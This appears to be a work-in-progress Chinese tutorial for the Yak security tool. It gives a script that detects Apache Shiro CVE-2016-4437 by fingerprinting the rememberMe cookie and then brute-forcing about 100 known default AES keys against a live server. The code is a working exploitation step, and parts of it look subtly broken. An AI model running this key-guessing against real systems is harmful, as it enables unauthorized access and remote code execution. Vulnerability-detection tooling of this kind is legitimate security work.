Skip to main content

Shiro CVE-2016-4437(WIP)

阅读本文前,请先确保已经熟悉 ThinkPHP-5.0.25-RCE 中相关内容

本篇中将会涉及到 Shiro 这类比较复杂的漏洞检测,我们将完全通过 Yak 内部的模块完成该模块

Work In Progress

更详细的编码教程与解读我们将在后续补充

原代码#

log.setLevel("info")isHttps = cli.Bool("https")
// 构建 shiro 基础请求baseFreq := fuzz.HTTPRequest(`GET / HTTP/1.1Host: example.comConnection: close
`)[0].FuzzHTTPHeader("Host", "cybertunnel.run:8080")
// 发送数据包,取一下指纹结果result = baseFreq.FuzzCookie("rememberMe", "{{rs(10)}}").ExecFirst(    httpool.https(isHttps), httpool.redirectTimes(4),)[0]die(result.Error)
url, reqRaw, rspRaw = result.Url, result.RequestRaw, result.ResponseRaw
// 检查指纹headers, body := str.SplitHTTPHeadersAndBodyFromPacket(rspRaw)if !str.MatchAnyOfSubString(headers, "rememberMe=deleteMe;") {    die("no shiro detected")}
log.info("shiro on %v detected", url)log.info("start to check key")
// 指纹检测工程,接下来准备猜 keykeys = [    "kPH+bIxk5D2deZiIxcaaaA==",    "4AvVhmFLUs0KTA3Kprsdag==",    "Z3VucwAAAAAAAAAAAAAAAA==",    "fCq+/xW488hMTCD+cmJ3aQ==",    "0AvVhmFLUs0KTA3Kprsdag==",    "1AvVhdsgUs0FSA3SDFAdag==",    "1QWLxg+NYmxraMoxAXu/Iw==",    "25BsmdYwjnfcWmnhAciDDg==",    "2AvVhdsgUs0FSA3SDFAdag==",    "3AvVhmFLUs0KTA3Kprsdag==",    "3JvYhmBLUs0ETA5Kprsdag==",    "r0e3c16IdVkouZgk1TKVMg==",    "5aaC5qKm5oqA5pyvAAAAAA==",    "5AvVhmFLUs0KTA3Kprsdag==",    "6AvVhmFLUs0KTA3Kprsdag==",    "6NfXkC7YVCV5DASIrEm1Rg==",    "6ZmI6I2j5Y+R5aSn5ZOlAA==",    "cmVtZW1iZXJNZQAAAAAAAA==",    "7AvVhmFLUs0KTA3Kprsdag==",    "8AvVhmFLUs0KTA3Kprsdag==",    "8BvVhmFLUs0KTA3Kprsdag==",    "9AvVhmFLUs0KTA3Kprsdag==",    "OUHYQzxQ/W9e/UjiAGu6rg==",    "a3dvbmcAAAAAAAAAAAAAAA==",    "aU1pcmFjbGVpTWlyYWNsZQ==",    "bWljcm9zAAAAAAAAAAAAAA==",    "bWluZS1hc3NldC1rZXk6QQ==",    "bXRvbnMAAAAAAAAAAAAAAA==",    "ZUdsaGJuSmxibVI2ZHc9PQ==",    "wGiHplamyXlVB11UXWol8g==",    "U3ByaW5nQmxhZGUAAAAAAA==",    "MTIzNDU2Nzg5MGFiY2RlZg==",    "L7RioUULEFhRyxM7a2R/Yg==",    "a2VlcE9uR29pbmdBbmRGaQ==",    "WcfHGU25gNnTxTlmJMeSpw==",    "OY//C4rhfwNxCQAQCrQQ1Q==",    "5J7bIJIV0LQSN3c9LPitBQ==",    "f/SY5TIve5WWzT4aQlABJA==",    "bya2HkYo57u6fWh5theAWw==",    "WuB+y2gcHRnY2Lg9+Aqmqg==",    "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",    "3qDVdLawoIr1xFd6ietnwg==",    "ZWvohmPdUsAWT3=KpPqda",    "YI1+nBV//m7ELrIyDHm6DQ==",    "6Zm+6I2j5Y+R5aS+5ZOlAA==",    "2A2V+RFLUs+eTA3Kpr+dag==",    "6ZmI6I2j3Y+R1aSn5BOlAA==",    "SkZpbmFsQmxhZGUAAAAAAA==",    "2cVtiE83c4lIrELJwKGJUw==",    "fsHspZw/92PrS3XrPW+vxw==",    "XTx6CKLo/SdSgub+OPHSrw==",    "sHdIjUN6tzhl8xZMG3ULCQ==",    "O4pdf+7e+mZe8NyxMTPJmQ==",    "HWrBltGvEZc14h9VpMvZWw==",    "rPNqM6uKFCyaL10AK51UkQ==",    "Y1JxNSPXVwMkyvES/kJGeQ==",    "lT2UvDUmQwewm6mMoiw4Ig==",    "MPdCMZ9urzEA50JDlDYYDg==",    "xVmmoltfpb8tTceuT5R7Bw==",    "c+3hFGPjbgzGdrC+MHgoRQ==",    "ClLk69oNcA3m+s0jIMIkpg==",    "Bf7MfkNR0axGGptozrebag==",    "1tC/xrDYs8ey+sa3emtiYw==",    "ZmFsYWRvLnh5ei5zaGlybw==",    "cGhyYWNrY3RmREUhfiMkZA==",    "IduElDUpDDXE677ZkhhKnQ==",    "yeAAo1E8BOeAYfBlm4NG9Q==",    "cGljYXMAAAAAAAAAAAAAAA==",    "2itfW92XazYRi5ltW0M2yA==",    "XgGkgqGqYrix9lI6vxcrRw==",    "ertVhmFLUs0KTA3Kprsdag==",    "5AvVhmFLUS0ATA4Kprsdag==",    "s0KTA3mFLUprK4AvVhsdag==",    "hBlzKg78ajaZuTE0VLzDDg==",    "9FvVhtFLUs0KnA3Kprsdyg==",    "d2ViUmVtZW1iZXJNZUtleQ==",    "yNeUgSzL/CfiWw1GALg6Ag==",    "NGk/3cQ6F5/UNPRh8LpMIg==",    "4BvVhmFLUs0KTA3Kprsdag==",    "MzVeSkYyWTI2OFVLZjRzZg==",    "CrownKey==a12d/dakdad",    "empodDEyMwAAAAAAAAAAAA==",    "A7UzJgh1+EWj5oBFi+mSgw==",    "YTM0NZomIzI2OTsmIzM0NTueYQ==",    "c2hpcm9fYmF0aXMzMgAAAA==",    "i45FVt72K2kLgvFrJtoZRw==",    "U3BAbW5nQmxhZGUAAAAAAA==",    "ZnJlc2h6Y24xMjM0NTY3OA==",    "Jt3C93kMR9D5e8QzwfsiMw==",    "MTIzNDU2NzgxMjM0NTY3OA==",    "vXP33AonIp9bFwGl7aT7rA==",    "V2hhdCBUaGUgSGVsbAAAAA==",    "Z3h6eWd4enklMjElMjElMjE=",    "Q01TX0JGTFlLRVlfMjAxOQ==",    "ZAvph3dsQs0FSL3SDFAdag==",    "Is9zJ3pzNh2cgTHB4ua3+Q==",    "NsZXjXVklWPZwOfkvk6kUA==",    "GAevYnznvgNCURavBhCr1w==",    "66v1O8keKNV3TTcGPK1wzg==",    "SDKOLKn2J1j/2BHjeZwAoQ==",]
data = codec.DecodeHex(`aced0005737200326f72672e6170616368652e736869726f2e7375626a6563742e53696d706c655072696e636970616c436f6c6c656374696f6ea87f5825c6a3084a0300014c000f7265616c6d5072696e636970616c7374000f4c6a6176612f7574696c2f4d61703b78707077010078`)[0]
cookies = make([]string)for _, key = range keys {    for _, rs = range [        codec.AESCBCEncrypt,        codec.AESGCMDecrypt,    ] {        keyBytes = codec.DecodeBase64(key)[0]        res, err := rs(keyBytes, data, nil)        if err != nil {            println(err)            continue        }        cookieRaw = append(keyBytes, res...)        base64dK := codec.EncodeBase64(cookieRaw)        cookies = append(cookies, base64dK)    }}
println("start go fuzz rememberMe")r, err := baseFreq.FuzzCookie("rememberMe", cookies).Exec(httpool.https(isHttps), httpool.size(3))die(err)
keyFoundResult = varfor result = range r {    if result.Error != nil {        continue    }    header, body = str.SplitHTTPHeadersAndBodyFromPacket(result.ResponseRaw)    if str.MatchAllOfSubString(header, "rememberMe=deleteMe") {        continue    }    keyFoundResult = result    break}
// keyFoundResultprintln(string(keyFoundResult.RequestRaw))